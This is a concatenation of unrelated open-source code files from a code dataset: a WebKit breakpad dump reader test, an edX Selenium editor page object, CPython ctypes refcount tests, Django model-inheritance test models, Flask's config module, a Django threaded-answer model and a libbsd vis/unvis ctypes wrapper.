temasek/android_external_chromium_org_third_party_WebKit | Tools/Scripts/webkitpy/layout_tests/breakpad/dump_reader_multipart_unittest.py | 58 | 5192 | # Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
import cgi
from webkitpy.common.host import Host
from webkitpy.common.host_mock import MockHost
from webkitpy.common.system.executive_mock import MockExecutive
from webkitpy.layout_tests.breakpad.dump_reader_multipart import DumpReaderMultipart
class TestDumpReaderMultipart(unittest.TestCase):
_MULTIPART_DUMP = [
'--boundary',
'Content-Disposition: form-data; name="prod"',
'',
'content_shell',
'--boundary',
'Content-Disposition: form-data; name="pid"',
'',
'4711',
'--boundary',
'Content-Disposition: form-data; name="upload_file_minidump"; filename="dump"',
'Content-Type: application/octet-stream',
'',
'MDMP',
'--boundary--',
]
def test_check_generate_breakpad_symbols_actually_exists(self):
host = Host()
dump_reader = DumpReaderMultipart(host, build_dir=None)
self.assertTrue(host.filesystem.exists(dump_reader._path_to_generate_breakpad_symbols()))
def test_check_is_functional_breakpad_tools_not_found(self):
host = MockHost()
build_dir = "/mock-checkout/out/Debug"
host.filesystem.maybe_make_directory(build_dir)
dump_reader = DumpReaderMultipart(host, build_dir)
dump_reader._file_extension = lambda: 'dmp'
dump_reader._binaries_to_symbolize = lambda: ['content_shell']
self.assertFalse(dump_reader.check_is_functional())
def test_get_pid_from_dump(self):
host = MockHost()
dump_file = '/crash-dumps/dump.dmp'
expected_pid = '4711'
host.filesystem.write_text_file(dump_file, "\r\n".join(TestDumpReaderMultipart._MULTIPART_DUMP))
build_dir = "/mock-checkout/out/Debug"
host.filesystem.maybe_make_directory(build_dir)
host.filesystem.exists = lambda x: True
# The mock file object returned by open_binary_file_for_reading doesn't
# have readline(), however, the real File object does.
host.filesystem.open_binary_file_for_reading = host.filesystem.open_text_file_for_reading
dump_reader = DumpReaderMultipart(host, build_dir)
dump_reader._file_extension = lambda: 'dmp'
dump_reader._binaries_to_symbolize = lambda: ['content_shell']
self.assertTrue(dump_reader.check_is_functional())
self.assertEqual(expected_pid, dump_reader._get_pid_from_dump(dump_file))
def test_get_stack_from_dump(self):
host = MockHost()
dump_file = '/crash-dumps/dump.dmp'
host.filesystem.write_text_file(dump_file, "\r\n".join(TestDumpReaderMultipart._MULTIPART_DUMP))
build_dir = "/mock-checkout/out/Debug"
host.filesystem.maybe_make_directory(build_dir)
host.filesystem.exists = lambda x: True
# The mock file object returned by open_binary_file_for_reading doesn't
# have readline(), however, the real File object does.
host.filesystem.open_binary_file_for_reading = host.filesystem.open_text_file_for_reading
dump_reader = DumpReaderMultipart(host, build_dir)
dump_reader._file_extension = lambda: 'dmp'
dump_reader._binaries_to_symbolize = lambda: ['content_shell']
self.assertTrue(dump_reader.check_is_functional())
self.assertEqual("MOCK output of child process", dump_reader._get_stack_from_dump(dump_file))
self.assertEqual(2, len(host.executive.calls))
cmd_line = " ".join(host.executive.calls[0])
self.assertIn('generate_breakpad_symbols.py', cmd_line)
cmd_line = " ".join(host.executive.calls[1])
self.assertIn('minidump_stackwalk', cmd_line)
| bsd-3-clause |
jruiperezv/ANALYSE | common/test/acceptance/pages/studio/html_component_editor.py | 115 | 1139 | from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.action_chains import ActionChains
from component_editor import ComponentEditorView
class HtmlComponentEditorView(ComponentEditorView):
"""
Represents the rendered view of an HTML component editor.
"""
def set_content_and_save(self, content):
"""
Types content into the html component and presses Save.
"""
self.set_content(content)
self.save()
def set_content_and_cancel(self, content):
"""
Types content into the html component and presses Cancel to abort the change.
"""
self.set_content(content)
self.cancel()
def set_content(self, content):
"""
Types content into the html component, leaving the component open.
"""
self.q(css='.edit-xblock-modal .editor-modes .editor-button').click()
editor = self.q(css=self._bounded_selector('.html-editor .mce-edit-area'))[0]
ActionChains(self.browser).click(editor).\
send_keys([Keys.CONTROL, 'a']).key_up(Keys.CONTROL).send_keys(content).perform()
| agpl-3.0 |
amyvmiwei/kbengine | kbe/res/scripts/common/Lib/ctypes/test/test_refcounts.py | 114 | 2576 | import unittest
from test import support
import ctypes
import gc
MyCallback = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_int)
OtherCallback = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_int, ctypes.c_ulonglong)
import _ctypes_test
dll = ctypes.CDLL(_ctypes_test.__file__)
class RefcountTestCase(unittest.TestCase):
@support.refcount_test
def test_1(self):
from sys import getrefcount as grc
f = dll._testfunc_callback_i_if
f.restype = ctypes.c_int
f.argtypes = [ctypes.c_int, MyCallback]
def callback(value):
#print "called back with", value
return value
self.assertEqual(grc(callback), 2)
cb = MyCallback(callback)
self.assertGreater(grc(callback), 2)
result = f(-10, cb)
self.assertEqual(result, -18)
cb = None
gc.collect()
self.assertEqual(grc(callback), 2)
@support.refcount_test
def test_refcount(self):
from sys import getrefcount as grc
def func(*args):
pass
# this is the standard refcount for func
self.assertEqual(grc(func), 2)
# the CFuncPtr instance holds at least one refcount on func:
f = OtherCallback(func)
self.assertGreater(grc(func), 2)
# and may release it again
del f
self.assertGreaterEqual(grc(func), 2)
# but now it must be gone
gc.collect()
self.assertEqual(grc(func), 2)
class X(ctypes.Structure):
_fields_ = [("a", OtherCallback)]
x = X()
x.a = OtherCallback(func)
# the CFuncPtr instance holds at least one refcount on func:
self.assertGreater(grc(func), 2)
# and may release it again
del x
self.assertGreaterEqual(grc(func), 2)
# and now it must be gone again
gc.collect()
self.assertEqual(grc(func), 2)
f = OtherCallback(func)
# the CFuncPtr instance holds at least one refcount on func:
self.assertGreater(grc(func), 2)
# create a cycle
f.cycle = f
del f
gc.collect()
self.assertEqual(grc(func), 2)
class AnotherLeak(unittest.TestCase):
def test_callback(self):
import sys
proto = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_int, ctypes.c_int)
def func(a, b):
return a * b * 2
f = proto(func)
a = sys.getrefcount(ctypes.c_int)
f(1, 2)
self.assertEqual(sys.getrefcount(ctypes.c_int), a)
if __name__ == '__main__':
unittest.main()
| lgpl-3.0 |
oberlin/django | tests/model_inheritance/models.py | 227 | 4810 | """
XX. Model inheritance
Model inheritance exists in two varieties:
- abstract base classes which are a way of specifying common
information inherited by the subclasses. They don't exist as a separate
model.
- non-abstract base classes (the default), which are models in their own
right with their own database tables and everything. Their subclasses
have references back to them, created automatically.
Both styles are demonstrated here.
"""
from __future__ import unicode_literals
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
#
# Abstract base classes
#
@python_2_unicode_compatible
class CommonInfo(models.Model):
name = models.CharField(max_length=50)
age = models.PositiveIntegerField()
class Meta:
abstract = True
ordering = ['name']
def __str__(self):
return '%s %s' % (self.__class__.__name__, self.name)
class Worker(CommonInfo):
job = models.CharField(max_length=50)
class Student(CommonInfo):
school_class = models.CharField(max_length=10)
class Meta:
pass
#
# Abstract base classes with related models
#
class Post(models.Model):
title = models.CharField(max_length=50)
@python_2_unicode_compatible
class Attachment(models.Model):
post = models.ForeignKey(Post, models.CASCADE, related_name='attached_%(class)s_set')
content = models.TextField()
class Meta:
abstract = True
def __str__(self):
return self.content
class Comment(Attachment):
is_spam = models.BooleanField(default=False)
class Link(Attachment):
url = models.URLField()
#
# Multi-table inheritance
#
@python_2_unicode_compatible
class Chef(models.Model):
name = models.CharField(max_length=50)
def __str__(self):
return "%s the chef" % self.name
@python_2_unicode_compatible
class Place(models.Model):
name = models.CharField(max_length=50)
address = models.CharField(max_length=80)
def __str__(self):
return "%s the place" % self.name
class Rating(models.Model):
rating = models.IntegerField(null=True, blank=True)
class Meta:
abstract = True
ordering = ['-rating']
@python_2_unicode_compatible
class Restaurant(Place, Rating):
serves_hot_dogs = models.BooleanField(default=False)
serves_pizza = models.BooleanField(default=False)
chef = models.ForeignKey(Chef, models.SET_NULL, null=True, blank=True)
class Meta(Rating.Meta):
db_table = 'my_restaurant'
def __str__(self):
return "%s the restaurant" % self.name
@python_2_unicode_compatible
class ItalianRestaurant(Restaurant):
serves_gnocchi = models.BooleanField(default=False)
def __str__(self):
return "%s the italian restaurant" % self.name
@python_2_unicode_compatible
class Supplier(Place):
customers = models.ManyToManyField(Restaurant, related_name='provider')
def __str__(self):
return "%s the supplier" % self.name
@python_2_unicode_compatible
class ParkingLot(Place):
# An explicit link to the parent (we can control the attribute name).
parent = models.OneToOneField(Place, models.CASCADE, primary_key=True, parent_link=True)
main_site = models.ForeignKey(Place, models.CASCADE, related_name='lot')
def __str__(self):
return "%s the parking lot" % self.name
#
# Abstract base classes with related models where the sub-class has the
# same name in a different app and inherits from the same abstract base
# class.
# NOTE: The actual API tests for the following classes are in
# model_inheritance_same_model_name/models.py - They are defined
# here in order to have the name conflict between apps
#
class Title(models.Model):
title = models.CharField(max_length=50)
class NamedURL(models.Model):
title = models.ForeignKey(Title, models.CASCADE, related_name='attached_%(app_label)s_%(class)s_set')
url = models.URLField()
class Meta:
abstract = True
@python_2_unicode_compatible
class Copy(NamedURL):
content = models.TextField()
def __str__(self):
return self.content
class Mixin(object):
def __init__(self):
self.other_attr = 1
super(Mixin, self).__init__()
class MixinModel(models.Model, Mixin):
pass
class Base(models.Model):
titles = models.ManyToManyField(Title)
class SubBase(Base):
sub_id = models.IntegerField(primary_key=True)
class GrandParent(models.Model):
first_name = models.CharField(max_length=80)
last_name = models.CharField(max_length=80)
email = models.EmailField(unique=True)
class Meta:
unique_together = ('first_name', 'last_name')
class Parent(GrandParent):
pass
class Child(Parent):
pass
class GrandChild(Child):
pass
| bsd-3-clause |
cataliniordache/Human-Computer-Interaction-Project | RestfulServices/flask/lib/python2.7/site-packages/flask/config.py | 781 | 6234 | # -*- coding: utf-8 -*-
"""
flask.config
~~~~~~~~~~~~
Implements the configuration related objects.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import imp
import os
import errno
from werkzeug.utils import import_string
from ._compat import string_types
class ConfigAttribute(object):
"""Makes an attribute forward to the config"""
def __init__(self, name, get_converter=None):
self.__name__ = name
self.get_converter = get_converter
def __get__(self, obj, type=None):
if obj is None:
return self
rv = obj.config[self.__name__]
if self.get_converter is not None:
rv = self.get_converter(rv)
return rv
def __set__(self, obj, value):
obj.config[self.__name__] = value
class Config(dict):
"""Works exactly like a dict but provides ways to fill it from files
or special dictionaries. There are two common patterns to populate the
config.
Either you can fill the config from a config file::
app.config.from_pyfile('yourconfig.cfg')
Or alternatively you can define the configuration options in the
module that calls :meth:`from_object` or provide an import path to
a module that should be loaded. It is also possible to tell it to
use the same module and with that provide the configuration values
just before the call::
DEBUG = True
SECRET_KEY = 'development key'
app.config.from_object(__name__)
In both cases (loading from any Python file or loading from modules),
only uppercase keys are added to the config. This makes it possible to use
lowercase values in the config file for temporary values that are not added
to the config or to define the config keys in the same file that implements
the application.
Probably the most interesting way to load configurations is from an
environment variable pointing to a file::
app.config.from_envvar('YOURAPPLICATION_SETTINGS')
In this case before launching the application you have to set this
environment variable to the file you want to use. On Linux and OS X
use the export statement::
export YOURAPPLICATION_SETTINGS='/path/to/config/file'
On windows use `set` instead.
:param root_path: path to which files are read relative from. When the
config object is created by the application, this is
the application's :attr:`~flask.Flask.root_path`.
:param defaults: an optional dictionary of default values
"""
def __init__(self, root_path, defaults=None):
dict.__init__(self, defaults or {})
self.root_path = root_path
def from_envvar(self, variable_name, silent=False):
"""Loads a configuration from an environment variable pointing to
a configuration file. This is basically just a shortcut with nicer
error messages for this line of code::
app.config.from_pyfile(os.environ['YOURAPPLICATION_SETTINGS'])
:param variable_name: name of the environment variable
:param silent: set to `True` if you want silent failure for missing
files.
:return: bool. `True` if able to load config, `False` otherwise.
"""
rv = os.environ.get(variable_name)
if not rv:
if silent:
return False
raise RuntimeError('The environment variable %r is not set '
'and as such configuration could not be '
'loaded. Set this variable and make it '
'point to a configuration file' %
variable_name)
return self.from_pyfile(rv, silent=silent)
def from_pyfile(self, filename, silent=False):
"""Updates the values in the config from a Python file. This function
behaves as if the file was imported as module with the
:meth:`from_object` function.
:param filename: the filename of the config. This can either be an
absolute filename or a filename relative to the
root path.
:param silent: set to `True` if you want silent failure for missing
files.
.. versionadded:: 0.7
`silent` parameter.
"""
filename = os.path.join(self.root_path, filename)
d = imp.new_module('config')
d.__file__ = filename
try:
with open(filename) as config_file:
exec(compile(config_file.read(), filename, 'exec'), d.__dict__)
except IOError as e:
if silent and e.errno in (errno.ENOENT, errno.EISDIR):
return False
e.strerror = 'Unable to load configuration file (%s)' % e.strerror
raise
self.from_object(d)
return True
def from_object(self, obj):
"""Updates the values from the given object. An object can be of one
of the following two types:
- a string: in this case the object with that name will be imported
- an actual object reference: that object is used directly
Objects are usually either modules or classes.
Just the uppercase variables in that object are stored in the config.
Example usage::
app.config.from_object('yourapplication.default_config')
from yourapplication import default_config
app.config.from_object(default_config)
You should not use this function to load the actual configuration but
rather configuration defaults. The actual config should be loaded
with :meth:`from_pyfile` and ideally from a location not within the
package because the package might be installed system wide.
:param obj: an import name or object
"""
if isinstance(obj, string_types):
obj = import_string(obj)
for key in dir(obj):
if key.isupper():
self[key] = getattr(obj, key)
def __repr__(self):
return '<%s %s>' % (self.__class__.__name__, dict.__repr__(self))
| apache-2.0 |
uniqna/uniqna | threads/models.py | 2 | 2396 | from __future__ import unicode_literals
from django.db import models
from django.urls import reverse
from django.utils import timezone
from django.utils.encoding import uri_to_iri
from django.contrib.auth.models import User
from mptt.models import MPTTModel, TreeForeignKey
from post.models import Question
from root.algorithms import vote_score
from root.algorithms.parser import parse
class ManagerExtender(models.Manager):
def score_update(self):
for answer in self.all():
answer.set_score()
class Answer(MPTTModel):
question = models.ForeignKey(Question, on_delete=models.CASCADE)
parent = TreeForeignKey('self', null=True, blank=True, related_name='children', db_index=True, on_delete=models.CASCADE)
metatype = models.CharField(max_length=20, default="question", blank=False)
description = models.TextField(blank=False, null=False)
answer_author = models.CharField("Author", max_length=100, default="anon")
created_time = models.DateTimeField(default=timezone.now)
edited_time = models.DateTimeField(default=timezone.now, editable=True)
edited = models.BooleanField(default=False)
ups = models.ManyToManyField(User, related_name='upvotes', blank=True)
downs = models.ManyToManyField(User, related_name='downvotes', blank=True)
points = models.IntegerField(default=1)
score = models.DecimalField(default=0, max_digits=20, decimal_places=17)
objects = ManagerExtender()
def __str__(self):
return str(self.description)
def get_absolute_url(self):
if self.parent:
url = reverse("reply", args=[self.question.id, self.id])
else:
url = reverse("answer", args=[self.question.id, self.id])
# reverse() encodes the url characters such as # to %23
# uri_to_iri changes it back again
url = uri_to_iri(url)
return url
def get_time(self):
t = timezone.localtime(self.created_time)
return "{}-{}-{} {}:{}".format(t.day, t.month, t.year, t.hour, t.minute)
def get_edited_time(self):
t = timezone.localtime(self.edited_time)
return "{}-{}-{} {}:{}".format(t.day, t.month, t.year, t.hour, t.minute)
def set_edited_time(self):
self.edited = True
self.edited_time = timezone.now()
def set_score(self):
self.points = self.ups.count() - self.downs.count()
self.score = vote_score.confidence(self.ups.count(), self.downs.count())
self.save()
def parse(self):
return parse(self)
class MPTTMeta:
order_insertion_by = ['-score']
| bsd-3-clause |
rllynguh/C.B.U.L.M.S. | vendor/psy/psysh/test/tools/vis.py | 710 | 3428 | """
vis.py
======
Ctypes based module to access libbsd's strvis & strunvis functions.
The `vis` function is the equivalent of strvis.
The `unvis` function is the equivalent of strunvis.
All functions accept unicode string as input and return a unicode string.
Constants:
----------
* to select alternate encoding format
`VIS_OCTAL`: use octal \ddd format
`VIS_CSTYLE`: use \[nrft0..] where appropiate
* to alter set of characters encoded
(default is to encode all non-graphic except space, tab, and newline).
`VIS_SP`: also encode space
`VIS_TAB`: also encode tab
`VIS_NL`: also encode newline
`VIS_WHITE`: same as (VIS_SP | VIS_TAB | VIS_NL)
`VIS_SAFE`: only encode "unsafe" characters
* other
`VIS_NOSLASH`: inhibit printing '\'
`VIS_HTTP1808`: http-style escape % hex hex
`VIS_HTTPSTYLE`: http-style escape % hex hex
`VIS_MIMESTYLE`: mime-style escape = HEX HEX
`VIS_HTTP1866`: http-style &#num; or &string;
`VIS_NOESCAPE`: don't decode `\'
`VIS_GLOB`: encode glob(3) magic characters
:Authors:
- ju1ius (http://github.com/ju1ius)
:Version: 1
:Date: 2014-01-05
"""
from ctypes import CDLL, c_char_p, c_int
from ctypes.util import find_library
__all__ = [
'vis', 'unvis',
'VIS_OCTAL', 'VIS_CSTYLE',
'VIS_SP', 'VIS_TAB', 'VIS_NL', 'VIS_WHITE', 'VIS_SAFE',
'VIS_NOSLASH', 'VIS_HTTP1808', 'VIS_HTTPSTYLE', 'VIS_MIMESTYLE',
'VIS_HTTP1866', 'VIS_NOESCAPE', 'VIS_GLOB'
]
#############################################################
# Constants from bsd/vis.h
#############################################################
#to select alternate encoding format
VIS_OCTAL = 0x0001
VIS_CSTYLE = 0x0002
# to alter set of characters encoded
# (default is to encode all non-graphic except space, tab, and newline).
VIS_SP = 0x0004
VIS_TAB = 0x0008
VIS_NL = 0x0010
VIS_WHITE = VIS_SP | VIS_TAB | VIS_NL
VIS_SAFE = 0x0020
# other
VIS_NOSLASH = 0x0040
VIS_HTTP1808 = 0x0080
VIS_HTTPSTYLE = 0x0080
VIS_MIMESTYLE = 0x0100
VIS_HTTP1866 = 0x0200
VIS_NOESCAPE = 0x0400
VIS_GLOB = 0x1000
#############################################################
# Import libbsd/vis functions
#############################################################
_libbsd = CDLL(find_library('bsd'))
_strvis = _libbsd.strvis
_strvis.argtypes = [c_char_p, c_char_p, c_int]
_strvis.restype = c_int
_strunvis = _libbsd.strunvis
_strvis.argtypes = [c_char_p, c_char_p]
_strvis.restype = c_int
def vis(src, flags=VIS_WHITE):
"""
Encodes the string `src` into libbsd's vis encoding.
`flags` must be one of the VIS_* constants
C definition:
int strvis(char *dst, char *src, int flags);
"""
src = bytes(src, 'utf-8')
dst_p = c_char_p(bytes(len(src) * 4))
src_p = c_char_p(src)
flags = c_int(flags)
bytes_written = _strvis(dst_p, src_p, flags)
if -1 == bytes_written:
raise RuntimeError('vis failed to encode string "{}"'.format(src))
return dst_p.value.decode('utf-8')
def unvis(src):
"""
Decodes a string encoded by vis.
C definition:
int strunvis(char *dst, char *src);
"""
src = bytes(src, 'utf-8')
dst_p = c_char_p(bytes(len(src)))
src_p = c_char_p(src)
bytes_written = _strunvis(dst_p, src_p)
if -1 == bytes_written:
raise RuntimeError('unvis failed to decode string "{}"'.format(src))
return dst_p.value.decode('utf-8')
| gpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.